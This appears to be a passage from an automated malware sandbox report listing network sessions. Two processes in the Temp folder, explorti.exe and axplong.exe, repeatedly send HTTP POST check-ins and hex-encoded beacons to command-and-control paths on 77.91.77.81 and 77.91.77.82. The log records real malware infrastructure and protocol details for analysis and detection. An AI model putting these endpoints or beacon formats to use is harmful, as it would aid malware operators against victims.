                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        125192.168.2.64996777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:13.816956043 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:14.542393923 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        126192.168.2.64996877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:14.236675978 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:14.938484907 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        127192.168.2.64997077.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:14.656816006 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:15.404619932 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        128192.168.2.64997177.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:14.948998928 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:15.672120094 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        129192.168.2.64997277.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:15.416181087 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:16.123476028 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        130192.168.2.64997377.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:15.804223061 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:16.549726963 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        131192.168.2.64997477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:16.242907047 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:16.961317062 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        132192.168.2.64997577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:16.562107086 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:17.266052008 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        133192.168.2.64997677.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:16.973886967 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:17.664560080 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        134192.168.2.64997777.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:17.383410931 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        135192.168.2.64997877.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:17.402376890 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:18.147598028 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        136192.168.2.64997977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:17.786998034 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:18.490982056 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        137192.168.2.64998077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:18.269468069 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:19.090812922 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:16:19.337268114 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        138192.168.2.64998177.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:18.502988100 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:19.339802027 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        139192.168.2.64998277.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:19.343713999 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:20.077306032 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        140192.168.2.64998377.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:19.455679893 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:20.157341003 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        141192.168.2.64998477.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:20.168128967 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:16:20.879626989 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        142192.168.2.64998577.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:20.202480078 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:20.907093048 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        143192.168.2.64998677.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:20.918173075 CEST310OUTPOST /Kiru9gu/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.81
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                                                                                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                                                                                        Jul 24, 2024 07:16:21.646212101 CEST196INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 7 <c><d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        144192.168.2.64998777.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:16:20.994234085 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:16:21.718240976 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:16:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0


